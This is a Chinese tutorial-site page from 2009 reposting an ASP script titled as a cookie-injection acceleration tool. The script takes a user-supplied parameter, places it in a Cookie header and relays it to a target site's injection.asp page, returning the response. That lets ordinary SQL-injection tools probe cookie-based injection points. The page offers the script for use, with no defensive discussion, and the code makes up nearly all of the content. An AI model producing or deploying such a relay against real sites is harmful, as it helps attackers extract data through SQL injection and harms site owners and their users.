当前位置: 首页 > 图文教程 > 网络编程 > ASP > ASP版实现cookies注入加速工具

ASP
无限级分类
ASP漏洞全接触-高级篇
ASP漏洞全接触-入门篇
调试ASP脚本
ASP编程经典例子
ASP技术访问WEB数据库
ASP中巧用Response属性
用ISAPIfilter使INC、ASA文件安全
浅析COM的思想及原理(1)
浅析COM的思想及原理(2)
浅析COM的思想及原理(3)
比较ADO与ODBC的区别
asp提供在线文章翻译的功能
关于文摘插件提交表单的开发
Access通用-自动替换数据库中的字符串
复选框用法
1小时ASP入门
显示目录下所有的文件(含文件夹)
[漏洞]利用Activer server explorer可对文件进行读写访问
给你的FSO对象加把锁

ASP版实现cookies注入加速工具


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-09-13   浏览: 237 ::
收藏到网摘: n/a

来源:职业欠钱&zj1244共用的public Blog

复制代码 代码如下:

<%
Str="xxxid="&escape(request("FK"))
Url="http://xxx.chinaxxx.com/injection.asp"
response.write PostData(Url,Str)
Function PostData(PostUrl,PostCok)
Dim Http
Set Http = Server.CreateObject("msxml2.serverXMLHTTP")
With Http
.Open "GET",PostUrl,False
.SetRequestHeader "Cookie",PostCok
.Send
PostData = .ResponseBody
End With
Set Http = Nothing
PostData =bytes2BSTR(PostData)
End Function
Function bytes2BSTR(vIn)
Dim strReturn
Dim I, ThisCharCode, NextCharCode
strReturn = ""
For I = 1 To LenB(vIn)
ThisCharCode = AscB(MidB(vIn, I, 1))
If ThisCharCode < &H80 Then
strReturn = strReturn & Chr(ThisCharCode)
Else
NextCharCode = AscB(MidB(vIn, I + 1, 1))
strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
I = I + 1
End If
Next
bytes2BSTR = strReturn
End Function
%>